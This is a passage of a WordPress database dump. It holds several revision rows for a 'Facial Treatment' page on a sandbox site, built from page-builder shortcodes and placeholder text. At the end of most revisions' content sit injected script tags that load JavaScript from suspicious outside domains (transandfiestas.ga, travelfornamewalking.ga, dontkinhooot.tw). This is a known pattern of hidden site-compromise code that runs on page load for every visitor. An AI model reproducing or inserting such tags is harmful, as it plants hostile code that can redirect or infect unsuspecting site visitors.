icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:58:00','2018-01-11 00:58:00','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6624,1,'2018-01-11 00:59:41','2018-01-11 00:59:41','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Facial Treatment\" font_container=\"tag:h2|font_size:32|text_align:left|line_height:32\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:59:41','2018-01-11 00:59:41','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6625,1,'2018-01-11 01:00:16','2018-01-11 01:00:16','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Facial Treatment\" font_container=\"tag:h2|font_size:32|text_align:left|line_height:32\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:00:16','2018-01-11 01:00:16','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6626,1,'2018-01-11 01:01:06','2018-01-11 01:01:06','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:01:06','2018-01-11 01:01:06','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6627,1,'2018-01-11 01:01:37','2018-01-11 01:01:37','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" 